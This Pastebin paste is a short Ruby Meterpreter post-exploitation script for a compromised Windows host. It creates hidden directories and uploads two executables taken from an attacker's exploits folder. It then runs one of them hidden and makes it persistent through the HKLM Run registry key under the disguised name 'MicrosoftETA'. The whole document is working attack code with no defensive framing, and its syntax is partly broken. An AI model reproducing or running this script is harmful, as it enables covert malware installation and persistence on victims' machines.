Guest User

Untitled

a guest
Jun 18th, 2018
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.00 KB | None | 0 0
  1. avs = %W{
  2. Bot.exe
  3.  
  4. }
  5.  
  6. client.sys.process.get_processes().each do |x|
  7.  
  8. if (!avs.index(x['name'].downcase))
  9. {
  10. print_status("LAUNCHING SCRIPT FROM SESSION #{client}")
  11. print_status("Creating directory")
  12. client.fs.dir.mkdir("c:\\system")
  13. client.fs.dir.mkdir("c:\\system\\windows")
  14. client.fs.file.upload_file("c:\\system\\windows\\wingrab.exe" , "/root/Desktop/exploits/Project/wingrab.exe")
  15. client.fs.file.upload_file("c:\\system\\windows\\winview.exe" , "/root/Desktop/exploits/Project/winview.exe")
  16. client.sys.process.execute("c:\\system\\windows\\wingrab.exe", nil, {'Hidden' => 'true'})
  17. key = "HKLM\\software\\microsoft\\windows\\currentversion\\run"
  18. value = "MicrosoftETA"
  19. data = "c:\\system\\windows\\wingrab.exe"
  20. type = "REG_SZ"
  21. root_key, base_key = client.sys.registry.splitkey(key)
  22. open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  23. open_key.set_value(value, client.sys.registry.type2str(type), data)
  24. print_line("Successful")
  25. }
  26. end
  27. else
  28. print("Process running...")
  29. end
Add Comment
Please, Sign In to add comment